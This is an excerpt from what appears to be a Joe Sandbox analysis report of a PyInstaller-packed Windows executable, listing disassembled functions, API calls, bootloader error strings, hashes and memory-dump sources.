                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: 0f969e6fb3265fee7630cdf4d153662912e2351cfe086ee8c9ce282ec24edd98
                                                                                                                                                                                                                                                        • Instruction ID: 971332d278c562a2a0ae1ba0dd0cca4e61e4c845f64a6a11b721d0270c42a492
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f969e6fb3265fee7630cdf4d153662912e2351cfe086ee8c9ce282ec24edd98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E416E21B2D65282FA10DF56AA016BDB390BF68BC4F544433ED4D8779ADE3CE525CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9241470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        • Opcode ID: ba69cb2111a26844a3bb1f636b4ed516f2970dba1f1f6f2553b333e5179dfc8e
                                                                                                                                                                                                                                                        • Instruction ID: b5ddbcb533eeeca00361037890843d371f7b8213451657c6a7e4a4cbafc13b1b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba69cb2111a26844a3bb1f636b4ed516f2970dba1f1f6f2553b333e5179dfc8e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A419F22A2865296FB10DF21AA011FD73A0FF68794F444433ED4D87B9ADE3CE525CB40
                                                                                                                                                                                                                                                        Function 00007FF6D924EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                        • Instruction ID: 58c462a2c43489f2acd7294adef47688afb9da2c0468cd4f7a962b670462723a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37D19332A28B418AFB20DF65D5403AD77A0FB697A8F100136DE4D97B95CF38E4A5CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9242C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242C9E
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242D63
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6D9242D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                        • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                        • Instruction ID: b6da3abe6ee96b1b98b4f91b38d2dd70b23adfc7049d424cfe095fbc9bb1c979
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D31E522B18A4142F720AF66AA102BE66A1BF98798F410137EF4DD7B59DF3CD516C740
                                                                                                                                                                                                                                                        Function 00007FF6D924DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DD4D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DD5B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DD85
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DDF3
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6D924DF7A,?,?,?,00007FF6D924DC6C,?,?,?,00007FF6D924D869), ref: 00007FF6D924DDFF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                        • Instruction ID: 418ae58b7cccfd407f5557749195ef9e1c0c6a3e76fbb45cb32b56a12f9bbc78
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931A322B2A642D1FE11AF02AA006BD2394FF5CBA4F594636DD1D86B94DF3CF4648B00
                                                                                                                                                                                                                                                        Function 00007FF6D9246360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                        • Instruction ID: cb78cccbebac2aba69a7fed1e1757998e4e54d101ec80671ca230dfe1f96c578
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0418331A3C68691FA21EF20E6141EE6361FF68344F804133EA5D87695EF3CE529CB90
                                                                                                                                                                                                                                                        Function 00007FF6D9242A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6D924351A,?,00000000,00007FF6D9243F23), ref: 00007FF6D9242AA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                        • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                        • Instruction ID: 732d05d7710ab4eb2737267becb9b033b37416d7f8cd6da9a4166a7c451f0013
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84218E32A29B8182F720DF55B9817EA73A4FB98784F400136EE8C93A59DF3CD255CB40
                                                                                                                                                                                                                                                        Function 00007FF6D925B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                                        • Instruction ID: 8b8d04647d1c541d9cd6b27b39434df112610edc39d431b1ea9eae89d527a6f2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C216F20F2D24282FAD8AF229B5627D52425F447F0F148736D93EC7ADEDE2CB8208310
                                                                                                                                                                                                                                                        Function 00007FF6D9267D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                        • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                        • Instruction ID: 2b18e63188b50b3ce609437d657a71edfe20e77b08ff929d1e7a6d040469a77a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F114C21A28B4186F7508F52B99532D66A4BB88BE4F044236EA5DC7BA4DF7CD864C780
                                                                                                                                                                                                                                                        Function 00007FF6D9248ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9248EFD
                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9248F5A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9249390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92445F4,00000000,00007FF6D9241985), ref: 00007FF6D92493C9
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9248FE5
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9249044
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D9249055
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9243FB1), ref: 00007FF6D924906A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                        • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                        • Instruction ID: a4e692864971de607ead0557df8b0ac1e66772760808bc57b3aab372e5a59bca
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC419466A2E68281FB309F12A6002BE7394FB99BD4F451136DF8D97789DE3DD520CB40
                                                                                                                                                                                                                                                        Function 00007FF6D925B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B2D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B30D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B33A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B34B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B35C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6D9254F11,?,?,?,?,00007FF6D925A48A,?,?,?,?,00007FF6D925718F), ref: 00007FF6D925B377
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                                        • Instruction ID: 0f736aaa02517f72cec70537d4fc75f897e4461e6fc86ab473e2dafcd1e7a00d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3113020F2D65292FAD4AF219B9127D52429F447B0F144737D92ED7ADEDE2CA4618300
                                                                                                                                                                                                                                                        Function 00007FF6D9242910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9241B6A), ref: 00007FF6D924295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                        • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                        • Instruction ID: d24d9175cb35377a766d0999425e1f42d4b57bcc98542d1fe6e1db3ec74819c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E031F422B2868152F720AF65AA416FE6294BF987D4F400133EE8DD3B59EF3CD166C740
                                                                                                                                                                                                                                                        Function 00007FF6D9242390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
